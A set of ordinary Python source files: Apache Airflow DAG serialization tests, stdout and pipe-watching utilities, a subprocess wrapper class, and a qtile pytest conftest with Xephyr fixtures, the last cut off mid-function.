in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command=["echo", "true"])
serialized_dag = SerializedDAG.to_dict(dag)
assert "bash_command" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert getattr(simple_task, "bash_command") == ["echo", "true"]
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
assert serialized_dag["dag"]["tasks"][0]["_operator_extra_links"] == [
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 0}},
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 1}},
]
# Test all the extra_links are set
assert set(simple_task.extra_links) == {
'BigQuery Console #1',
'BigQuery Console #2',
'airflow',
'github',
'google',
}
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', ["dummy_value_1", "dummy_value_2"])
# Test Deserialized inbuilt link #1
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #1")
assert 'https://console.cloud.google.com/bigquery?j=dummy_value_1' == custom_inbuilt_link
# Test Deserialized inbuilt link #2
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #2")
assert 'https://console.cloud.google.com/bigquery?j=dummy_value_2' == custom_inbuilt_link
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
assert "https://www.google.com" == google_link_from_plugin
class ClassWithCustomAttributes:
"""
Class for testing purpose: allows to create objects with custom attributes in one single statement.
"""
def __init__(self, **kwargs):
for key, value in kwargs.items():
setattr(self, key, value)
def __str__(self):
return f"{self.__class__.__name__}({str(self.__dict__)})"
def __repr__(self):
return self.__str__()
def __eq__(self, other):
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self.__eq__(other)
@parameterized.expand(
[
(None, None),
([], []),
({}, {}),
("{{ task.task_id }}", "{{ task.task_id }}"),
(["{{ task.task_id }}", "{{ task.task_id }}"]),
({"foo": "{{ task.task_id }}"}, {"foo": "{{ task.task_id }}"}),
({"foo": {"bar": "{{ task.task_id }}"}}, {"foo": {"bar": "{{ task.task_id }}"}}),
(
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
),
(
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
),
(
ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]
),
"ClassWithCustomAttributes("
"{'att1': '{{ task.task_id }}', 'att2': '{{ task.task_id }}', 'template_fields': ['att1']})",
),
(
ClassWithCustomAttributes(
nested1=ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]
),
nested2=ClassWithCustomAttributes(
att3="{{ task.task_id }}", att4="{{ task.task_id }}", template_fields=["att3"]
),
template_fields=["nested1"],
),
"ClassWithCustomAttributes("
"{'nested1': ClassWithCustomAttributes({'att1': '{{ task.task_id }}', "
"'att2': '{{ task.task_id }}', 'template_fields': ['att1']}), "
"'nested2': ClassWithCustomAttributes({'att3': '{{ task.task_id }}', 'att4': "
"'{{ task.task_id }}', 'template_fields': ['att3']}), 'template_fields': ['nested1']})",
),
]
)
def test_templated_fields_exist_in_serialized_dag(self, templated_field, expected_field):
"""
Test that templated_fields exists for all Operators in Serialized DAG
Since we don't want to inflate arbitrary python objects (it poses a RCE/security risk etc.)
we want check that non-"basic" objects are turned in to strings after deserializing.
"""
dag = DAG("test_serialized_template_fields", start_date=datetime(2019, 8, 1))
with dag:
BashOperator(task_id="test", bash_command=templated_field)
serialized_dag = SerializedDAG.to_dict(dag)
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_test_task = deserialized_dag.task_dict["test"]
assert expected_field == getattr(deserialized_test_task, "bash_command")
def test_dag_serialized_fields_with_schema(self):
"""
Additional Properties are disabled on DAGs. This test verifies that all the
keys in DAG.get_serialized_fields are listed in Schema definition.
"""
dag_schema: dict = load_dag_schema_dict()["definitions"]["dag"]["properties"]
# The parameters we add manually in Serialization needs to be ignored
ignored_keys: set = {
"is_subdag",
"tasks",
"has_on_success_callback",
"has_on_failure_callback",
"dag_dependencies",
}
dag_params: set = set(dag_schema.keys()) - ignored_keys
assert set(DAG.get_serialized_fields()) == dag_params
def test_operator_subclass_changing_base_defaults(self):
assert (
BaseOperator(task_id='dummy').do_xcom_push is True
), "Precondition check! If this fails the test won't make sense"
class MyOperator(BaseOperator):
def __init__(self, do_xcom_push=False, **kwargs):
super().__init__(**kwargs)
self.do_xcom_push = do_xcom_push
op = MyOperator(task_id='dummy')
assert op.do_xcom_push is False
blob = SerializedBaseOperator.serialize_operator(op)
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert serialized_op.do_xcom_push is False
def test_no_new_fields_added_to_base_operator(self):
"""
This test verifies that there are no new fields added to BaseOperator. And reminds that
tests should be added for it.
"""
base_operator = BaseOperator(task_id="10")
fields = base_operator.__dict__
assert {
'_BaseOperator__instantiated': True,
'_dag': None,
'_downstream_task_ids': set(),
'_inlets': [],
'_log': base_operator.log,
'_outlets': [],
'_upstream_task_ids': set(),
'depends_on_past': False,
'do_xcom_push': True,
'doc': None,
'doc_json': None,
'doc_md': None,
'doc_rst': None,
'doc_yaml': None,
'email': None,
'email_on_failure': True,
'email_on_retry': True,
'end_date': None,
'execution_timeout': None,
'executor_config': {},
'inlets': [],
'label': '10',
'max_retry_delay': None,
'on_execute_callback': None,
'on_failure_callback': None,
'on_retry_callback': None,
'on_success_callback': None,
'outlets': [],
'owner': 'airflow',
'params': {},
'pool': 'default_pool',
'pool_slots': 1,
'priority_weight': 1,
'queue': 'default',
'resources': None,
'retries': 0,
'retry_delay': timedelta(0, 300),
'retry_exponential_backoff': False,
'run_as_user': None,
'sla': None,
'start_date': None,
'subdag': None,
'task_concurrency': None,
'task_id': '10',
'trigger_rule': 'all_success',
'wait_for_downstream': False,
'weight_rule': 'downstream',
} == fields, """
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
ACTION NEEDED! PLEASE READ THIS CAREFULLY AND CORRECT TESTS CAREFULLY
Some fields were added to the BaseOperator! Please add them to the list above and make sure that
you add support for DAG serialization - you should add the field to
`airflow/serialization/schema.json` - they should have correct type defined there.
Note that we do not support versioning yet so you should only add optional fields to BaseOperator.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
"""
def test_task_group_serialization(self):
"""
Test TaskGroup serialization/deserialization.
"""
from airflow.operators.dummy import DummyOperator
from airflow.utils.task_group import TaskGroup
execution_date = datetime(2020, 1, 1)
with DAG("test_task_group_serialization", start_date=execution_date) as dag:
task1 = DummyOperator(task_id="task1")
with TaskGroup("group234") as group234:
_ = DummyOperator(task_id="task2")
with TaskGroup("group34") as group34:
_ = DummyOperator(task_id="task3")
_ = DummyOperator(task_id="task4")
task5 = DummyOperator(task_id="task5")
task1 >> group234
group34 >> task5
dag_dict = SerializedDAG.to_dict(dag)
SerializedDAG.validate_schema(dag_dict)
json_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(json_dag, dag)
serialized_dag = SerializedDAG.deserialize_dag(SerializedDAG.serialize_dag(dag))
assert serialized_dag.task_group.children
assert serialized_dag.task_group.children.keys() == dag.task_group.children.keys()
def check_task_group(node):
try:
children = node.children.values()
except AttributeError:
# Round-trip serialization and check the result
expected_serialized = SerializedBaseOperator.serialize_operator(dag.get_task(node.task_id))
expected_deserialized = SerializedBaseOperator.deserialize_operator(expected_serialized)
expected_dict = SerializedBaseOperator.serialize_operator(expected_deserialized)
assert node
assert SerializedBaseOperator.serialize_operator(node) == expected_dict
return
for child in children:
check_task_group(child)
check_task_group(serialized_dag.task_group)
def test_deps_sorted(self):
"""
Tests serialize_operator, make sure the deps is in order
"""
from airflow.operators.dummy import DummyOperator
from airflow.sensors.external_task import ExternalTaskSensor
execution_date = datetime(2020, 1, 1)
with DAG(dag_id="test_deps_sorted", start_date=execution_date) as dag:
task1 = ExternalTaskSensor(
task_id="task1",
external_dag_id="external_dag_id",
mode="reschedule",
)
task2 = DummyOperator(task_id="task2")
task1 >> task2
serialize_op = SerializedBaseOperator.serialize_operator(dag.task_dict["task1"])
deps = serialize_op["deps"]
assert deps == [
'airflow.ti_deps.deps.not_in_retry_period_dep.NotInRetryPeriodDep',
'airflow.ti_deps.deps.not_previously_skipped_dep.NotPreviouslySkippedDep',
'airflow.ti_deps.deps.prev_dagrun_dep.PrevDagrunDep',
'airflow.ti_deps.deps.ready_to_reschedule.ReadyToRescheduleDep',
'airflow.ti_deps.deps.trigger_rule_dep.TriggerRuleDep',
]
def test_task_group_sorted(self):
"""
Tests serialize_task_group, make sure the list is in order
"""
from airflow.operators.dummy import DummyOperator
from airflow.serialization.serialized_objects import SerializedTaskGroup
from airflow.utils.task_group import TaskGroup
"""
start
╱ ╲
╱ ╲
task_group_up1 task_group_up2
(task_up1) (task_up2)
╲ ╱
task_group_middle
(task_middle)
╱ ╲
task_group_down1 task_group_down2
(task_down1) (task_down2)
╲ ╱
╲ ╱
end
"""
execution_date = datetime(2020, 1, 1)
with DAG(dag_id="test_task_group_sorted", start_date=execution_date) as dag:
start = DummyOperator(task_id="start")
with TaskGroup("task_group_up1") as task_group_up1:
_ = DummyOperator(task_id="task_up1")
with TaskGroup("task_group_up2") as task_group_up2:
_ = DummyOperator(task_id="task_up2")
with TaskGroup("task_group_middle") as task_group_middle:
_ = DummyOperator(task_id="task_middle")
with TaskGroup("task_group_down1") as task_group_down1:
_ = DummyOperator(task_id="task_down1")
with TaskGroup("task_group_down2") as task_group_down2:
_ = DummyOperator(task_id="task_down2")
end = DummyOperator(task_id='end')
start >> task_group_up1
start >> task_group_up2
task_group_up1 >> task_group_middle
task_group_up2 >> task_group_middle
task_group_middle >> task_group_down1
task_group_middle >> task_group_down2
task_group_down1 >> end
task_group_down2 >> end
task_group_middle_dict = SerializedTaskGroup.serialize_task_group(
dag.task_group.children["task_group_middle"]
)
upstream_group_ids = task_group_middle_dict["upstream_group_ids"]
assert upstream_group_ids == ['task_group_up1', 'task_group_up2']
upstream_task_ids = task_group_middle_dict["upstream_task_ids"]
assert upstream_task_ids == ['task_group_up1.task_up1', 'task_group_up2.task_up2']
downstream_group_ids = task_group_middle_dict["downstream_group_ids"]
assert downstream_group_ids == ['task_group_down1', 'task_group_down2']
task_group_down1_dict = SerializedTaskGroup.serialize_task_group(
dag.task_group.children["task_group_down1"]
)
downstream_task_ids = task_group_down1_dict["downstream_task_ids"]
assert downstream_task_ids == ['end']
def test_edge_info_serialization(self):
"""
Tests edge_info serialization/deserialization.
"""
from airflow.operators.dummy import DummyOperator
from airflow.utils.edgemodifier import Label
with DAG("test_edge_info_serialization", start_date=datetime(2020, 1, 1)) as dag:
task1 = DummyOperator(task_id="task1")
task2 = DummyOperator(task_id="task2")
task1 >> Label("test label") >> task2
dag_dict = SerializedDAG.to_dict(dag)
SerializedDAG.validate_schema(dag_dict)
json_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(json_dag, dag)
serialized_dag = SerializedDAG.deserialize_dag(SerializedDAG.serialize_dag(dag))
assert serialized_dag.edge_info == dag.edge_info
@parameterized.expand(
[
("poke", False),
("reschedule", True),
]
)
def test_serialize_sensor(self, mode, expect_custom_deps):
from airflow.sensors.base import BaseSensorOperator
class DummySensor(BaseSensorOperator):
def poke(self, context):
return False
op = DummySensor(task_id='dummy', mode=mode, poke_interval=23)
blob = SerializedBaseOperator.serialize_operator(op)
if expect_custom_deps:
assert "deps" in blob
else:
assert "deps" not in blob
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert op.deps == serialized_op.deps
@parameterized.expand(
[
({"on_success_callback": lambda x: print("hi")}, True),
({}, False),
]
)
def test_dag_on_success_callback_roundtrip(self, passed_success_callback, expected_value):
"""
Test that when on_success_callback is passed to the DAG, has_on_success_callback is stored
in Serialized JSON blob. And when it is de-serialized dag.has_on_success_callback is set to True.
When the callback is not set, has_on_success_callback should not be stored in Serialized blob
and so default to False on de-serialization
"""
dag = DAG(dag_id='test_dag_on_success_callback_roundtrip', **passed_success_callback)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if expected_value:
assert "has_on_success_callback" in serialized_dag["dag"]
else:
assert "has_on_success_callback" not in serialized_dag["dag"]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
assert deserialized_dag.has_on_success_callback is expected_value
@parameterized.expand(
[
({"on_failure_callback": lambda x: print("hi")}, True),
({}, False),
]
)
def test_dag_on_failure_callback_roundtrip(self, passed_failure_callback, expected_value):
"""
Test that when on_failure_callback is passed to the DAG, has_on_failure_callback is stored
in Serialized JSON blob. And when it is de-serialized dag.has_on_failure_callback is set to True.
When the callback is not set, has_on_failure_callback should not be stored in Serialized blob
and so default to False on de-serialization
"""
dag = DAG(dag_id='test_dag_on_failure_callback_roundtrip', **passed_failure_callback)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if expected_value:
assert "has_on_failure_callback" in serialized_dag["dag"]
else:
assert "has_on_failure_callback" not in serialized_dag["dag"]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
assert deserialized_dag.has_on_failure_callback is expected_value
@parameterized.expand(
[
(
['task_1', 'task_5', 'task_2', 'task_4'],
['task_1', 'task_5', 'task_2', 'task_4'],
),
(
{'task_1', 'task_5', 'task_2', 'task_4'},
['task_1', 'task_2', 'task_4', 'task_5'],
),
(
('task_1', 'task_5', 'task_2', 'task_4'),
['task_1', 'task_5', 'task_2', 'task_4'],
),
(
{
"staging_schema": [
{"key:": "foo", "value": "bar"},
{"key:": "this", "value": "that"},
"test_conf",
]
},
{
"staging_schema": [
{"__type": "dict", "__var": {"key:": "foo", "value": "bar"}},
{
"__type": "dict",
"__var": {"key:": "this", "value": "that"},
},
"test_conf",
]
},
),
(
{"task3": "test3", "task2": "test2", "task1": "test1"},
{"task1": "test1", "task2": "test2", "task3": "test3"},
),
(
('task_1', 'task_5', 'task_2', 3, ["x", "y"]),
['task_1', 'task_5', 'task_2', 3, ["x", "y"]],
),
]
)
def test_serialized_objects_are_sorted(self, object_to_serialized, expected_output):
"""Test Serialized Sets are sorted while list and tuple preserve order"""
serialized_obj = SerializedDAG._serialize(object_to_serialized)
if isinstance(serialized_obj, dict) and "__type" in serialized_obj:
serialized_obj = serialized_obj["__var"]
assert serialized_obj == expected_output
def test_kubernetes_optional():
"""Serialisation / deserialisation continues to work without kubernetes installed"""
def mock__import__(name, globals_=None, locals_=None, fromlist=(), level=0):
if level == 0 and name.partition('.')[0] == 'kubernetes':
raise ImportError("No module named 'kubernetes'")
return importlib.__import__(name, globals=globals_, locals=locals_, fromlist=fromlist, level=level)
with mock.patch('builtins.__import__', side_effect=mock__import__) as import_mock:
# load module from scratch, this does not replace any already imported
# airflow.serialization.serialized_objects module in sys.modules
spec = importlib.util.find_spec("airflow.serialization.serialized_objects")
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
# if we got this far, the module did not try to load kubernetes, but
# did it try to access airflow.kubernetes.*?
imported_airflow = {
c.args[0].split('.', 2)[1] for c in import_mock.call_args_list if c.args[0].startswith("airflow.")
}
assert "kubernetes" not in imported_airflow
# pod loading is not supported when kubernetes is not available
pod_override = {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod),
}
with pytest.raises(RuntimeError):
module.BaseSerialization.from_dict(pod_override)
# basic serialization should succeed
module.SerializedDAG.to_dict(make_simple_dag()["simple_dag"])
|
io_utils.py
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020 Alibaba Group Holding Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import threading
from queue import Queue
class StdoutWrapper(object):
def __init__(self, stdout, queue=None):
self._stdout_backup = stdout
if queue is None:
self._lines = Queue()
else:
self._lines = queue
@property
def stdout(self):
return self._stdout_backup
def write(self, line):
line = line.encode("ascii", "ignore").decode("ascii")
self._stdout_backup.write(line)
self._lines.put(line)
def flush(self):
self._stdout_backup.flush()
def poll(self, block=True, timeout=None):
return self._lines.get(block=block, timeout=timeout)
class PipeWatcher(object):
def __init__(self, pipe, sink, queue=None, drop=True):
"""Watch a pipe, and buffer its output if drop is False."""
self._pipe = pipe
self._sink = sink
self._drop = drop
if queue is None:
self._lines = Queue()
else:
self._lines = queue
def read_and_poll(self):
for line in self._pipe:
try:
self._sink.write(line)
except: # noqa: E722
pass
try:
if not self._drop:
self._lines.put(line)
except: # noqa: E722
pass
self._polling_thread = threading.Thread(target=read_and_poll, args=(self,))
self._polling_thread.daemon = True
self._polling_thread.start()
def poll(self, block=True, timeout=None):
return self._lines.get(block=block, timeout=timeout)
def drop(self, drop=True):
self._drop = drop
|
process.py
|
import collections
import logging
import threading
import os
import sys
import signal
import platform
import subprocess
VERBOSE = True
class PopenProcess(object):
def __init__(self,
command,
read_line_callback,
read_error_callback = None,
proc_args = None,
ignore_cwd = False,
**kwargs
):
self.proc_args = proc_args
self.ignore_cwd = ignore_cwd
self.read_line_callback = read_line_callback
self._receiving_thread = threading.Thread(target=self._receiving_thread_target)
self._receiving_thread.daemon = True
self._stdin_lock = threading.Lock()
cwd = os.getcwd()
popen_args = {
"cwd": cwd,
"stdout": subprocess.PIPE,
"stdin": subprocess.PIPE,
"bufsize": 1, # Line buffering
"universal_newlines": True,
}
self._recerror_thread = None
self.read_error_callback = read_error_callback
if not ( self.read_error_callback is None ):
self._recerror_thread = threading.Thread(target=self._recerror_thread_target)
self._recerror_thread.daemon = True
popen_args["stderr"] = subprocess.PIPE
popen_args.update(kwargs)
cmdpath = os.path.join(cwd, command)
if self.ignore_cwd:
cmdpath = command
if VERBOSE:
print("popen", cmdpath, self.proc_args, popen_args)
else:
print("popen", cmdpath, self.proc_args)
if self.proc_args is None:
self.process = subprocess.Popen(cmdpath, **popen_args)
else:
self.process = subprocess.Popen([cmdpath] + self.proc_args, **popen_args)
if VERBOSE:
print("process opened")
self._receiving_thread.start()
if VERBOSE:
print("receiving thread started")
if not ( self._recerror_thread is None ):
self._recerror_thread.start()
if VERBOSE:
print("receiving error thread started")
def _receiving_thread_target(self):
while True:
line = self.process.stdout.readline()
if not line:
break
sline = line.rstrip()
self.read_line_callback(sline)
self.process.stdout.close()
with self._stdin_lock:
self.process.stdin.close()
if self.is_alive():
self.terminate()
self.wait_for_return_code()
def _recerror_thread_target(self):
while True:
line = self.process.stderr.readline()
if not line:
break
sline = line.rstrip()
self.read_error_callback(sline)
def is_alive(self):
return self.process.poll() is None
def terminate(self):
self.process.terminate()
def kill(self):
self.process.kill()
def send_line(self, string):
if VERBOSE:
print("sending line",string)
with self._stdin_lock:
self.process.stdin.write(string + "\n")
self.process.stdin.flush()
def wait_for_return_code(self):
self.process.wait()
return self.process.returncode
def pid(self):
return self.process.pid
def __repr__(self):
return "<PopenProcess at {0} (pid={1})>".format(hex(id(self)), self.pid())
|
conftest.py
|
# Copyright (c) 2011 Florian Mounier
# Copyright (c) 2011 Anshuman Bhaduri
# Copyright (c) 2014 Sean Vig
# Copyright (c) 2014-2015 Tycho Andersen
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import functools
import logging
import multiprocessing
import os
import subprocess
import sys
import tempfile
import time
import traceback
import pytest
import xcffib
import xcffib.testing
import xcffib.xproto
import libqtile.config
from libqtile import command, ipc
from libqtile.backend.x11.core import Core
from libqtile.confreader import Config
from libqtile.core.manager import Qtile
from libqtile.lazy import lazy
from libqtile.log_utils import init_log
from libqtile.resources import default_config
# the default sizes for the Xephyr windows
WIDTH = 800
HEIGHT = 600
SECOND_WIDTH = 640
SECOND_HEIGHT = 480
max_sleep = 5.0
sleep_time = 0.1
def pytest_addoption(parser):
parser.addoption(
"--debuglog", action="store_true", default=False, help="enable debug output"
)
class Retry:
def __init__(self, fail_msg='retry failed!', ignore_exceptions=(),
dt=sleep_time, tmax=max_sleep, return_on_fail=False):
self.fail_msg = fail_msg
self.ignore_exceptions = ignore_exceptions
self.dt = dt
self.tmax = tmax
self.return_on_fail = return_on_fail
def __call__(self, fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
tmax = time.time() + self.tmax
dt = self.dt
ignore_exceptions = self.ignore_exceptions
while time.time() <= tmax:
try:
return fn(*args, **kwargs)
except ignore_exceptions:
pass
except AssertionError:
break
time.sleep(dt)
dt *= 1.5
if self.return_on_fail:
return False
else:
raise AssertionError(self.fail_msg)
return wrapper
@Retry(ignore_exceptions=(xcffib.ConnectionException,), return_on_fail=True)
def can_connect_x11(disp=':0', *, ok=None):
if ok is not None and not ok():
raise AssertionError()
conn = xcffib.connect(display=disp)
conn.disconnect()
return True
@Retry(ignore_exceptions=(ipc.IPCError,), return_on_fail=True)
def can_connect_qtile(socket_path, *, ok=None):
if ok is not None and not ok():
raise AssertionError()
ipc_client = ipc.Client(socket_path)
ipc_command = command.interface.IPCCommandInterface(ipc_client)
client = command.client.InteractiveCommandClient(ipc_command)
val = client.status()
if val == 'OK':
return True
return False
def whereis(program):
"""Search PATH for executable"""
for path in os.environ.get('PATH', '').split(':'):
if os.path.exists(os.path.join(path, program)) and \
not os.path.isdir(os.path.join(path, program)):
return os.path.join(path, program)
return None
class BareConfig(Config):
auto_fullscreen = True
groups = [
libqtile.config.Group("a"),
libqtile.config.Group("b"),
libqtile.config.Group("c"),
libqtile.config.Group("d")
]
layouts = [
libqtile.layout.stack.Stack(num_stacks=1),
libqtile.layout.stack.Stack(num_stacks=2)
]
floating_layout = libqtile.resources.default_config.floating_layout
keys = [
libqtile.config.Key(
["control"],
"k",
lazy.layout.up(),
),
libqtile.config.Key(
["control"],
"j",
lazy.layout.down(),
),
]
mouse = []
screens = [libqtile.config.Screen()]
follow_mouse_focus = False
class Xephyr:
"""Spawn Xephyr instance
Set-up a Xephyr instance with the given parameters. The Xephyr instance
must be started, and then stopped.
"""
def __init__(self,
xinerama=True,
randr=False,
two_screens=True,
width=WIDTH,
height=HEIGHT,
xoffset=None):
self.xinerama = xinerama
self.randr = randr
self.two_screens = two_screens
self.width = width
self.height = height
if xoffset is None:
self.xoffset = width
else:
self.xoffset = xoffset
self.proc = None # Handle to Xephyr instance, subprocess.Popen object
self.display = None
self.display_file = None
def __enter__(self):
try:
self.start_xephyr()
except: # noqa: E722
self.stop_xephyr()
raise
return self
def __exit__(self, _exc_type, _exc_val, _exc_tb):
self.stop_xephyr()
def start_xephyr(self):
"""Start Xephyr instance
Starts the Xephyr instance and sets the `self.display` to the display
which is used to setup the instance.
"""
# get a new display
display, self.display_file = xcffib.testing.find_display()
self.display = ":{}".format(display)
# build up arguments
args = [
"Xephyr",
"-name",
"qtile_test",
self.display,
"-ac",
"-screen",
"{}x{}".format(self.width, self.height),
]
if self.two_screens:
args.extend(["-origin", "%s,0" % self.xoffset, "-screen",
"%sx%s" % (SECOND_WIDTH, SECOND_HEIGHT)])
if self.xinerama:
args.extend(["+xinerama"])
if self.randr:
args.extend(["+extension", "RANDR"])
self.proc = subprocess.Popen(args)
if can_connect_x11(self.display, ok=lambda: self.proc.poll() is None):
return
# we weren't able to get a display up
if self.proc.poll() is None:
raise AssertionError("Unable to connect to running Xephyr")
else:
raise AssertionError(
"Unable to start Xephyr, quit with return code "
f"{self.proc.returncode}"
)
def stop_xephyr(self):
"""Stop the Xephyr instance"""
# Xephyr must be started first
if self.proc is None:
return
# Kill xephyr only if it is running
if self.proc.poll() is None:
# We should always be able to kill xephyr nicely
self.proc.terminate()
self.proc.wait()
self.proc = None
# clean up the lock file for the display we allocated
try:
self.display_file.close()
os.remove(xcffib.testing.lock_path(int(self.display[1:])))
except OSError:
pass
class TestManager:
"""Spawn a Qtile instance
Setup a Qtile server instance on the given display, with the given socket
and log files. The Qtile server must be started, and then stopped when it
is done. Windows can be spawned for the Qtile instance to interact with
with various `.test_*` methods.
"""
def __init__(self, sockfile, display, debug_log):
self.sockfile = sockfile
self.display = display
self.log_level = logging.DEBUG if debug_log else logging.INFO
self.proc = None
self.c = None
self.testwindows = []
def start(self, config_class, no_spawn=False):
rpipe, wpipe = multiprocessing.Pipe()
def run_qtile():
try:
kore = Core(display_name=self.display)
init_log(self.log_level, log_path=None, log_color=False)
Qtile(
kore,
config_class(),
socket_path=self.sockfile,
no_spawn=no_spawn,
).loop()
except Exception:
wpipe.send(traceback.format_exc())
self.proc = multiprocessing.Process(target=run_qtile)
self.proc.start()
# First, wait for socket to appear
if can_connect_qtile(self.sockfile, ok=lambda: not rpipe.poll()):
ipc_client = ipc.Client(self.sockfile)
ipc_command = command.interface.IPCCommandInterface(ipc_client)
self.c = command.client.InteractiveCommandClient(ipc_command)
return
if rpipe.poll(sleep_time):
error = rpipe.recv()
raise AssertionError("Error launching qtile, traceback:\n%s" % error)
raise AssertionError("Error launching qtile")
def create_manager(self, config_class):
"""Create a Qtile manager instance in this thread
This should only be used when it is known that the manager will throw
an error and the returned manager should not be started, otherwise this
will likely block the thread.
"""
init_log(self.log_level, log_path=None, log_color=False)
kore = Core(display_name=self.display)
config = config_class()
for attr in dir(default_config):
if not hasattr(config, attr):
setattr(config, attr, getattr(default_config, attr))
return Qtile(kore, config, socket_path=self.sockfile)
def terminate(self):
if self.proc is None:
print("qtile is not alive", file=sys.stderr)
else:
# try to send SIGTERM and wait up to 10 sec to quit
self.proc.terminate()
self.proc.join(10)
if self.proc.is_alive():
print("Killing qtile forcefully", file=sys.stderr)
# desperate times... this probably messes with multiprocessing...
try:
os.kill(self.proc.pid, 9)
self.proc.join()
except OSError:
# The process may have died due to some other error
pass
if self.proc.exitcode:
print("qtile exited with exitcode: %d" % self.proc.exitcode, file=sys.stderr)
self.proc = None
for proc in self.testwindows[:]:
proc.terminate()
proc.wait()
self.testwindows.remove(proc)
def create_window(self, create, failed=None):
"""
Uses the fucntion f to create a window.
Waits until qtile actually maps the window and then returns.
"""
client = self.c
start = len(client.windows())
create()
@Retry(ignore_exceptions=(RuntimeError,), fail_msg='Window never appeared...')
def success():
while failed is None or not failed():
if len(client.windows()) > start:
return True
raise RuntimeError("not here yet")
return success()
def _spawn_window(self, *args):
"""Starts a program which opens a window
Spawns a new subprocess for a command that opens a window, given by the
arguments to this method. Spawns the new process and checks that qtile
maps the new window.
"""
if not args:
raise AssertionError("Trying to run nothing! (missing arguments)")
proc = None
def spawn():
nonlocal proc
proc = subprocess.Popen(args, env={"DISPLAY": self.display})
def failed():
if proc.poll() is not None:
return True
return False
self.create_window(spawn, failed=failed)
self.testwindows.append(proc)
return proc
def _spawn_script(self, script, *args):
python = sys.executable
d = os.path.dirname(os.path.realpath(__file__))
python = sys.executable
path = os.path.join(d, "scripts", script)
return self._spawn_window(python, path, *args)
def kill_window(self, proc):
"""Kill a window and check that qtile unmaps it
Kills a window created by calling one of the `self.test*` methods,
ensuring that qtile removes it from the `windows` attribute.
"""
assert proc in self.testwindows, "Given process is not a spawned window"
start = len(self.c.windows())
proc.terminate()
proc.wait()
self.testwindows.remove(proc)
@Retry(ignore_exceptions=(ValueError,))
def success():
if len(self.c.windows()) < start:
return True
raise ValueError('window is still in client list!')
if not success():
raise AssertionError("Window could not be killed...")
def test_window(self, name, type="normal"):
"""
Windows created with this method must have their process killed explicitly, no
matter what type they are.
"""
return self._spawn_script("window.py", self.display, name, type)
def test_dialog(self, name="dialog"):
return self.test_window(name, "dialog")
def test_notification(self, name="notification"):
return self.test_window(name, "notification")
def test_xclock(self):
path = whereis("xclock")
return self._spawn_window(path)
def test_xeyes(self):
path = whereis("xeyes")
return self._spawn_window(path)
def test_xcalc(self):
path = whereis("xcalc")
